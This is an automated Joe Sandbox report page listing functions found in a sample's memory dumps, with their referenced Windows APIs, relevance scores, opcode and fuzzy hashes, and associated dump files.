Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 2a1a34c23c061acde6bdbeebd1a2f01149dce54cd8164de65d9e2cbb96c69dac
Instruction ID: 7d4c5a10ff34f25828cbeb2d4f4dc38567b1bcac874b4f28ef05dadbe15e210c
Opcode Fuzzy Hash: 2a1a34c23c061acde6bdbeebd1a2f01149dce54cd8164de65d9e2cbb96c69dac
Instruction Fuzzy Hash: 70318F33608B8187DB609F24E8407AE33A8FB88754F540136EA9D83B98DF3ED245CB05

Function 00007FF6EF6E3F44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E3F74

Part of subcall function 00007FF6EF6DBDF0: GetCurrentProcess.KERNEL32(00007FF6EF6E517D), ref: 00007FF6EF6DBE1D

Strings

*?, xrefs: 00007FF6EF6E3F9B
., xrefs: 00007FF6EF6E4394

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 61dddb0fd46d8b382a6636bcfdb25f8edd0f775905ac41a4c6184214faf47e9a
Instruction ID: 87140415de3f14617893ee5644db097a1b0c67f0687267e7e31d4ddfada99839
Opcode Fuzzy Hash: 61dddb0fd46d8b382a6636bcfdb25f8edd0f775905ac41a4c6184214faf47e9a
Instruction Fuzzy Hash: 8B51F027B14A9687EF10CFB29C002F867A8AB58BD8B448136DE0D87B85DE3ED1019305

Function 00007FF6EF6E6290 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF6EF6E631B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: 4d8be04ff5fe09731b55b7f9b5fb0b03a75fd42ac222841e8de0b19f076dc853
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: E3D1B033B2828287DB24CF15E58476AB7A5FB98784F149134DB4E97B44CE3EEA419B04

Function 00007FF6EF6E4150 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF6EF6E4394

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: efa14f07fd73d25343c0280479d6777896963f113de0eda36cb2539f636c16eb
Instruction ID: 34a98326b238fb1d52c3763ae466988ab45c108de9241e8d4a7617ce2d8795d3
Opcode Fuzzy Hash: efa14f07fd73d25343c0280479d6777896963f113de0eda36cb2539f636c16eb
Instruction Fuzzy Hash: 40314B27B146914BFB209B32AC047BA6B95AB54BE0F14C335EE6C87BC5CE3DD2019309

Function 00007FF6EF6E9F68 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6EF6EA1B5
RaiseException.KERNEL32 ref: 00007FF6EF6EA1C6

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a32fc3c40a7428acc91df0296d6ee665e8b2f9a2d23ac3dad888973b23c96d3a
Instruction ID: 35b4647b58114a069532b1be0286ac2f8648fd7d892a7e83ce4651fc329ac607
Opcode Fuzzy Hash: a32fc3c40a7428acc91df0296d6ee665e8b2f9a2d23ac3dad888973b23c96d3a
Instruction Fuzzy Hash: 62B16B73604B858BEB15CF29C88636C3BE4F784B48F198921DA6D837A8CF3AD551D705

Function 00007FF6EF6D0DAC Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6D0BC8: GetDC.USER32 ref: 00007FF6EF6D0BD4
Part of subcall function 00007FF6EF6D0BC8: GetDeviceCaps.GDI32 ref: 00007FF6EF6D0BE5
Part of subcall function 00007FF6EF6D0BC8: ReleaseDC.USER32 ref: 00007FF6EF6D0BF2

GetObjectW.GDI32 ref: 00007FF6EF6D0E00

Part of subcall function 00007FF6EF6D1068: GetDC.USER32 ref: 00007FF6EF6D1091
Part of subcall function 00007FF6EF6D1068: GetObjectW.GDI32 ref: 00007FF6EF6D10BF
Part of subcall function 00007FF6EF6D1068: ReleaseDC.USER32 ref: 00007FF6EF6D1173

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: ea1151332f62513495a99a760a14d735b9f2695823dc17b4f3689cdaa19b8cc4
Instruction ID: 00aa66fd4b5e4cf579d1b7b20c29e219a978924835ba97967bb78c6083f0edb9
Opcode Fuzzy Hash: ea1151332f62513495a99a760a14d735b9f2695823dc17b4f3689cdaa19b8cc4
Instruction Fuzzy Hash: 11814937B08B4587EB109F6AE840AAC3775FB88B88F104522CE0D97B28DF7AE145D745

Function 00007FF6EF6D18DC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6EF6D1925
GetNumberFormatW.KERNEL32 ref: 00007FF6EF6D1981

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 1bfa26faf9951514472b653d0b127fd4e41c5556f325b3309d472936a36c29d1
Instruction ID: 991273f9e6aff522e3ea6325a6ebc7e271c9e8fe9d77f63aa1d55f42a70fa374
Opcode Fuzzy Hash: 1bfa26faf9951514472b653d0b127fd4e41c5556f325b3309d472936a36c29d1
Instruction Fuzzy Hash: BD115927A09B8597E7618F61F8103E97364FB88B88F844135EA8C87718DF3DE119D74A

Function 00007FF6EF6B8AD4 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6B8D1E), ref: 00007FF6EF6B8AE4
FormatMessageW.KERNEL32 ref: 00007FF6EF6B8B0D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: bc9588781f9e8ae787a89482c96c7bb4dfbb91f801cfc18cd6f2d20acdee2986
Instruction ID: 9c3a9121f22d79d1d02206c23a870cfe2590052fcf46e9f924907525cf724be6
Opcode Fuzzy Hash: bc9588781f9e8ae787a89482c96c7bb4dfbb91f801cfc18cd6f2d20acdee2986
Instruction Fuzzy Hash: 29E06573B1874183E7208F32B44032AA399BF55BC8F188134EA5987A98DF3DD6559709

Function 00007FF6EF6B370C Relevance: 2.0, Strings: 1, Instructions: 724COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF6EF6B3ECE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: 30343adeb27f084d3fe5ec6bc8831c2efd241b0a441db7c0f0173fc8b8a10148
Instruction ID: 7002dba1e8dc21a1770de88c42361a54b9b9bfe9d4e54d9c37ef214083c9cae3
Opcode Fuzzy Hash: 30343adeb27f084d3fe5ec6bc8831c2efd241b0a441db7c0f0173fc8b8a10148
Instruction Fuzzy Hash: D662F133B0828297EB189B25D1413FA67A8FB90344F404436E79E8769ADF3EF555E306

Function 00007FF6EF6BE84C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF6EF6BE87E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b24f66d090e7cb5f496f2a22c6f8819c0f8df7583923e225ed1b1fa359690d18
Instruction ID: 6199bb14d89e021f365d9aecfd940c104bee89c90d4b69b86512975406cd4a23
Opcode Fuzzy Hash: b24f66d090e7cb5f496f2a22c6f8819c0f8df7583923e225ed1b1fa359690d18
Instruction Fuzzy Hash: D4018437D4D9818BFA315720B4243B52754AFA5305F441574E58D862DADF7FA0449B0F

Function 00007FF6EF6DCF94 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF6EF6DD14B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 8fbd82179a0bfb313418515da4d647e3634da0e7ec0b4ab49d5c9d9e44874204
Instruction ID: 31dada4ec6dcefdf86bb1d8d27298156ffd60e3e3b36300ff8b13fac9fad2ef1
Opcode Fuzzy Hash: 8fbd82179a0bfb313418515da4d647e3634da0e7ec0b4ab49d5c9d9e44874204
Instruction Fuzzy Hash: 3281D023A1820387EAA8BE25954077E2398EF85748F741531DD09C76D5CF2FE846AB4B

Function 00007FF6EF6DCD18 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF6EF6DCEB2

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: 1627bba7a96c66c179e1cdbeb980cf1d7cd5ab671e027b86d3612952aae67f7a
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: 9A71C263A0C24A47FA78AA28804037D57989F85744F340631DD09EB6D6CF2FE846BF4B

Function 00007FF6EF6E0CDC Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF6EF6E0D18

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1f13d54a2f9508399cb7b836371d43eb46be01b66e99a774fe7656775252a00f
Instruction ID: e744fea78d5bfda1e0d8d577dfbbf2c0f99db619424840a28d1bdf8087f95775
Opcode Fuzzy Hash: 1f13d54a2f9508399cb7b836371d43eb46be01b66e99a774fe7656775252a00f
Instruction Fuzzy Hash: FF410D33714A448BEF44CF2AE8142A973A9AB88FC0B59A032DE0DC7754EE3DE542D305

Function 00007FF6EF6E51D0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6EF6E51D4

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d070c0900ae74f71d1c1d3c79620b9063d35bd6a65a1e84854eee095204d118d
Instruction ID: 7894c4e39f0bcbc56366e272d4db095c2f2aba169a013a2f91e6f7efb043da44
Opcode Fuzzy Hash: d070c0900ae74f71d1c1d3c79620b9063d35bd6a65a1e84854eee095204d118d
Instruction Fuzzy Hash: FFB09226E07B02C7FE482B527C96B1423A86F58B10FD84078C00C82320DE3E21F5A746

Function 00007FF6EF6B5A30 Relevance: .8, Instructions: 820COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3fd9693064f14b98246b0902696b6ddb848b57710f43f9edc21379a48acf59
Instruction ID: fd18876545126728a7fd6c3cefb40925b8c73f4080281032f593c3eb26e1a33f
Opcode Fuzzy Hash: 4f3fd9693064f14b98246b0902696b6ddb848b57710f43f9edc21379a48acf59
Instruction Fuzzy Hash: DA72AFAAD3EF865AE303A73954031A6E7186FF35C9641E32BFD9432C52FB11A6D25204

Function 00007FF6EF6CD650 Relevance: .8, Instructions: 777COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538b2af4148d52b0e0a3f2785ca9e9110ee7305f6a0c25a72d3737ecd3153b96
Instruction ID: 3eb512520589654e702b6bd2e2790c9c1850d6277000d0062f74b6627e4ec695
Opcode Fuzzy Hash: 538b2af4148d52b0e0a3f2785ca9e9110ee7305f6a0c25a72d3737ecd3153b96
Instruction Fuzzy Hash: E262DFB3A092C18BEB14CE24D4447BC3BA5F755748F05813ACBAA8BB85CE3DE505E715

Function 00007FF6EF6C39C4 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb5c1b57a26dc77a27d3af5a86bba1a43a40d7d20f63e008ef60ea07b56e39f
Instruction ID: cf553f2e2324396045b368d7b22b5fafe44d4cf6415b76f6465ff1615ccf104a
Opcode Fuzzy Hash: bcb5c1b57a26dc77a27d3af5a86bba1a43a40d7d20f63e008ef60ea07b56e39f
Instruction Fuzzy Hash: C222F5B3B206508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB39D505DB40

Function 00007FF6EF6CCE2C Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
